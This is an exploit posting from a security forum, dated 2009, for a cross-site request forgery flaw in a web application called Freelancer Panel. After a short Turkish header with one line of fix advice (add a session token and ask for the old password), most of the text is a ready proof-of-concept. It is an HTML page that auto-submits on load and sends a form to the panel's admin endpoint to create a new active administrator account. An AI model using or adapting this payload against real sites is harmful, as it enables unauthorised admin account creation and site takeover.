Freelancer Panel ~ XSRF | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Freelancer Panel ~ XSRF

Madde
	Author : Bug Researchers/BizaRRo
	Date : 03.02.2009 00:56:44
	# Freelancer Panel ~ XSRF [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : Freelancer Panel # Vulnerable Type : XSRF # Infection : Uzaktan otomatik olarak admin pass change edilebilir. # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. # author : Bug Researchers/BizaRRo ############################################################ < ------------------- header data end of ------------------- > < -- bug code start -- > <b0dy onLoad=Submit();> <script>function Submit[]{document.BizaRRo.submit();}</script> <form action=http://www.hidden.com/freelancer_panel/admincp/main.php?action=settings&subaction=add method=post> <input type=text name=username id=username value=addadd title=username /> <input type=password name=password id=password value=addadd title=password /> <input type=text name=email id=email value=addaddd@add.com title=Email /> <input type=text name=name id=name value=addadd title=Name /> <input type=radio name=status id=status value=active title=active checked> <input class=button type=submit name=submit value=create Admin /> < -- bug code end of -- >